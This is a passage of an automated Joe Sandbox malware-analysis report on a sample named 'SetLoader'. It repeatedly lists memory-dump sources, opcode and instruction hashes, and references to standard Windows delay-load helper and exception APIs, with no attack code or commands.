                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 63e6ab45ffa9e1fa781a63dc54a89719c384aec2479c3e6b642cfbc8072736db
                                              • Instruction ID: bc7bf423c067a3c392911c98119639bd8e97a27596b4067b47d0f9f785dd8121
                                              • Opcode Fuzzy Hash: 63e6ab45ffa9e1fa781a63dc54a89719c384aec2479c3e6b642cfbc8072736db
                                              • Instruction Fuzzy Hash: 55B012E535D102EC338453585C23C3F014FC4C5B10B31C93EF00CC0040D8401C8901B1
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0063068E
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 416fcc953047aac50f8ce083a7264fc800e7b95291373cc5af4d7477643eb845
                                              • Instruction ID: d3bce7e9d1c9d2e20fedb6de203a8ae6d116ffb4ea59734f936edc8c6493e8f0
                                              • Opcode Fuzzy Hash: 416fcc953047aac50f8ce083a7264fc800e7b95291373cc5af4d7477643eb845
                                              • Instruction Fuzzy Hash: 42B012E535C002EC324452485D23C3F014FC4C5B14731C87EF40CC0040D8411D4A1171
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0063068E
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 8c0705fdbfbcdcd090e8f1fcd9db9d00249618f33023412aea99f9735ff7c32d
                                              • Instruction ID: 510e23bbe33226c76edb84a8f09621110dee17850a839473cd0967570ca2d817
                                              • Opcode Fuzzy Hash: 8c0705fdbfbcdcd090e8f1fcd9db9d00249618f33023412aea99f9735ff7c32d
                                              • Instruction Fuzzy Hash: 59B012E535C002EC324452495C23C3F024FD4C5B14731C87EF00CC0040D8401C491171
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 006308A7
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 4935e95757d2564b9d66fa1bf021919108a90cb9fe166d868a75779b56c6fa37
                                              • Instruction ID: 3cc5560a7f436a2195e937eb389c81aab5779386d506732493b7cdd01fb013f9
                                              • Opcode Fuzzy Hash: 4935e95757d2564b9d66fa1bf021919108a90cb9fe166d868a75779b56c6fa37
                                              • Instruction Fuzzy Hash: 0BB012C236C000EC364862489C12D3A024FE4C4B10730CA2FF00CC0041D4401C8900F5
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 006308A7
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 27c771a785097abc22f1e3281d879b8a7a2d1bd51e3d2d2d6b9b7ec83106eafa
                                              • Instruction ID: e822cb69db42594574860f5152c45e0a20ef445891ee1c916e7b796d99f4ef94
                                              • Opcode Fuzzy Hash: 27c771a785097abc22f1e3281d879b8a7a2d1bd51e3d2d2d6b9b7ec83106eafa
                                              • Instruction Fuzzy Hash: D7B012C239C104EC324862485C22D3A024FE4C4B10730C82EF00CC0141E4401CC901B1
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 006309FC
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 8c901695e49989af13777dfc6953809d53200b927762c1972cd250e4ee063ff1
                                              • Instruction ID: 6ad6f3f36a2459b593da1a6e86e6eaec37275584bf3b54b9cbfff7b47885ec9c
                                              • Opcode Fuzzy Hash: 8c901695e49989af13777dfc6953809d53200b927762c1972cd250e4ee063ff1
                                              • Instruction Fuzzy Hash: 49B012C639C001FC32051248AE22C36054FCCC0B19B31C57EF004C0082D8511C0A0071
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 006309FC
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 87b5e83fa473507d4bfb409daf31262f8936c2d3a6d395246b696e4366c6dc6c
                                              • Instruction ID: e303deff8c33fcccdac2a4fc9f514322aa84ce7e500515e7aae5a226f55e70b3
                                              • Opcode Fuzzy Hash: 87b5e83fa473507d4bfb409daf31262f8936c2d3a6d395246b696e4366c6dc6c
                                              • Instruction Fuzzy Hash: E5B012C139C200EC32455248AD22D37059FC4C4B11730C57EF408C1081D4401C0D0171
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 006309FC
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: a9f3bcdf84dcb0be420be9c89e2fede6e924d74ccb696f0a6e774c5f9375103a
                                              • Instruction ID: 4ad2bb60108454e300d00a5ee13b80f424d1357ec43b1e2d70a5fb056a110f8a
                                              • Opcode Fuzzy Hash: a9f3bcdf84dcb0be420be9c89e2fede6e924d74ccb696f0a6e774c5f9375103a
                                              • Instruction Fuzzy Hash: 51B012C139C100EC33455258AD22D36098FC4C4B11730C63EF008C01C1D4411C4D0171
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 006309FC
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: bf7ffe457a5f590a9156a8e3d2ab02e6178e4eef078dd04e15e19045b7c73111
                                              • Instruction ID: 49864884c027751f0172812f37f1625df06132104e64c56bed7bbfa137db7e41
                                              • Opcode Fuzzy Hash: bf7ffe457a5f590a9156a8e3d2ab02e6178e4eef078dd04e15e19045b7c73111
                                              • Instruction Fuzzy Hash: 8EB012C139C000EC32455258AE22D37058FC4C4B11730C57EF008C0081D4411C0E0171
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0063068E
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: e590f2feb0f138cb82f6a4f22414063d4295a8ef08113abcb1ef731f72910e6f
                                              • Instruction ID: 4c9915c8b93282a1947d7b21c01c0cd276fa4d34205b3c971dfd090c67955b5e
                                              • Opcode Fuzzy Hash: e590f2feb0f138cb82f6a4f22414063d4295a8ef08113abcb1ef731f72910e6f
                                              • Instruction Fuzzy Hash: 5EA001EA2A9547FC32596295AD27C3F025ED8CAB65B328D6EF40AC4085A881289A50B5
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0063068E
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 2816b38e000a61c6e46c083e70189cf837f2490fa97b114a42162f56019d82f0
                                              • Instruction ID: 4c9915c8b93282a1947d7b21c01c0cd276fa4d34205b3c971dfd090c67955b5e
                                              • Opcode Fuzzy Hash: 2816b38e000a61c6e46c083e70189cf837f2490fa97b114a42162f56019d82f0
                                              • Instruction Fuzzy Hash: 5EA001EA2A9547FC32596295AD27C3F025ED8CAB65B328D6EF40AC4085A881289A50B5
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0063068E
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 760beb6f70660b20f920d686a19258980c6dc689db61b9b665864be770b9b9fc
                                              • Instruction ID: 4c9915c8b93282a1947d7b21c01c0cd276fa4d34205b3c971dfd090c67955b5e
                                              • Opcode Fuzzy Hash: 760beb6f70660b20f920d686a19258980c6dc689db61b9b665864be770b9b9fc
                                              • Instruction Fuzzy Hash: 5EA001EA2A9547FC32596295AD27C3F025ED8CAB65B328D6EF40AC4085A881289A50B5
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0063068E
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 50b0091e4fd0794469ddaf36f7710fdb8dbae0cedcd6f3568f3cfd19b485707c
                                              • Instruction ID: 4c9915c8b93282a1947d7b21c01c0cd276fa4d34205b3c971dfd090c67955b5e
                                              • Opcode Fuzzy Hash: 50b0091e4fd0794469ddaf36f7710fdb8dbae0cedcd6f3568f3cfd19b485707c
                                              • Instruction Fuzzy Hash: 5EA001EA2A9547FC32596295AD27C3F025ED8CAB65B328D6EF40AC4085A881289A50B5
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0063068E
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 7d6a6b3526076cc045d82440eb80dfe373bf3bcb678b2f5c289a5f48b25644b8
                                              • Instruction ID: 4c9915c8b93282a1947d7b21c01c0cd276fa4d34205b3c971dfd090c67955b5e
                                              • Opcode Fuzzy Hash: 7d6a6b3526076cc045d82440eb80dfe373bf3bcb678b2f5c289a5f48b25644b8
                                              • Instruction Fuzzy Hash: 5EA001EA2A9547FC32596295AD27C3F025ED8CAB65B328D6EF40AC4085A881289A50B5
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0063068E
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: d8c0f1febd8a8cc5a38ae2668e7beafcf6746499a50560c37e28e7d1cc994b46
                                              • Instruction ID: 4c9915c8b93282a1947d7b21c01c0cd276fa4d34205b3c971dfd090c67955b5e
                                              • Opcode Fuzzy Hash: d8c0f1febd8a8cc5a38ae2668e7beafcf6746499a50560c37e28e7d1cc994b46
                                              • Instruction Fuzzy Hash: 5EA001EA2A9547FC32596295AD27C3F025ED8CAB65B328D6EF40AC4085A881289A50B5
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0063068E
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: a96a13641b1374aad1aa91664005186122611168255ff18b270b568e1442f392
                                              • Instruction ID: 4c9915c8b93282a1947d7b21c01c0cd276fa4d34205b3c971dfd090c67955b5e
                                              • Opcode Fuzzy Hash: a96a13641b1374aad1aa91664005186122611168255ff18b270b568e1442f392
                                              • Instruction Fuzzy Hash: 5EA001EA2A9547FC32596295AD27C3F025ED8CAB65B328D6EF40AC4085A881289A50B5
                                              APIs
